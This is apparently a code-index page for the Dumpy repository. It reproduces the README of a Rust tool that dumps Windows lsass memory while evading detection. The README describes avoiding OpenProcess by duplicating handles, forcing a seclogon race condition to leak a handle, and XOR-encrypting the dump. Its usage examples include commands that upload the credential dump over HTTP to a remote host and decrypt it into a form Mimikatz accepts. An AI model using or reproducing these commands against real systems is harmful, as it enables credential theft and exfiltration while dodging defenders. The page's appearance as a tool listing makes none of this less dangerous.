MCPcopy Index your code
hub / github.com/Kudaes/Dumpy

github.com/Kudaes/Dumpy @main

Chat with this repo
repository ↗ · DeepWiki ↗ · + Follow
56 symbols 116 edges 7 files 30 documented · 54% updated 2y ago★ 247
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

Description

This tool dynamically calls MiniDumpWriteDump to dump lsass memory content. This process is done without opening a new process handle to lsass and using DInvoke_rs to make it harder to detect its malicious behaviour. In order to obtain a valid process handle without calling OpenProcess over lsass, all process handles in the system are analyzed using NtQuerySystemInformation, NtDuplicateObject, NtQueryObject and QueryFullProcessImageNameW.

NTFS Transaction are used in order to xor the memory dump before storing it on disk or sending it throught HTTP.

Support added for both x86 and x64.

Compilation

Just compile the code on release mode and execute it:

C:\Users\User\Desktop\Dumpy\dumpy> cargo build --release
C:\Users\User\Desktop\Dumpy\dumpy\target\x86_64-pc-windows-msvc\release> dumpy.exe -h

In case that you want to compile the tool for a x86 system, modify the value of the option "target" in the file .cargo\config (e.g: target = "i686-pc-windows-msvc").

Usage

Usage: dumpy.exe --dump|--decrypt [options]

Options:
    -h, --help          Print this help menu.
        --dump          Dump lsass.
        --decrypt       Decrypt a previously generated dump file.
    -f, --force         Force seclogon's service to leak a lsass handle
                        through a race condition.
    -k, --key           Encryption key [default: 1234abcd]
    -i, --input         Encrypted dump file [default: c:\temp\input.txt]
    -o, --output        Destination path [default: c:\temp\output.txt]
    -u, --upload        Upload URL

Dumpy has two main actions:

  • dump: It will execute the main logic to dump the lsass. By default, it will store the result in a xored text file with a random name in the current directory. The option upload allows to send the memory content over HTTP to a remote host, avoiding the creation of the xored file on disk. I've used this simple HTTP server in order to handle the upload, but any other HTTP server that supports multipart/form-data requests will work.
    C:\Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload
    

If you want to force the leakage of a handle to the lsass through the race condition in seclogon's service described by Antonio Cocomazzi in this post, just use the option force:

    C:\Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload --force
  • decrypt: This action allows to obtain the decrypted memory dump in the same format that tools like Mimikatz would expect. As arguments it expects the xored memory dump, the encryption key and the output file path. In case the xored file has been uploaded using HTTP, it is required to perform a base64 decoding of the content before this decryption process.
    C:\Temp> dumpy.exe --decrypt -i xored.txt -o decrypted.txt -k secretKey
    

Core symbols most depended-on inside this repo

get_module_base_address
called by 26
dumpy/dinvoke/src/lib.rs
close_handle
called by 26
dumpy/dinvoke/src/lib.rs
get_function_address
called by 4
dumpy/dinvoke/src/lib.rs
load_library_a
called by 3
dumpy/dinvoke/src/lib.rs
get_pid_from_image_path
called by 3
dumpy/dumper/src/lib.rs
nt_duplicate_object
called by 2
dumpy/dinvoke/src/lib.rs
nt_query_object
called by 2
dumpy/dinvoke/src/lib.rs
ldr_get_procedure_address
called by 1
dumpy/dinvoke/src/lib.rs

Shape

Function 39
Class 16
Method 1

Languages

Rust100%

Modules by API surface

dumpy/dinvoke/src/lib.rs30 symbols
dumpy/data/src/lib.rs17 symbols
dumpy/dumper/src/lib.rs4 symbols
dumpy/src/main.rs3 symbols
dumpy/build.rs1 symbols
dumpy/bindings/build.rs1 symbols

For agents

$ claude mcp add Dumpy \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact

Ask about this repo answers extend the page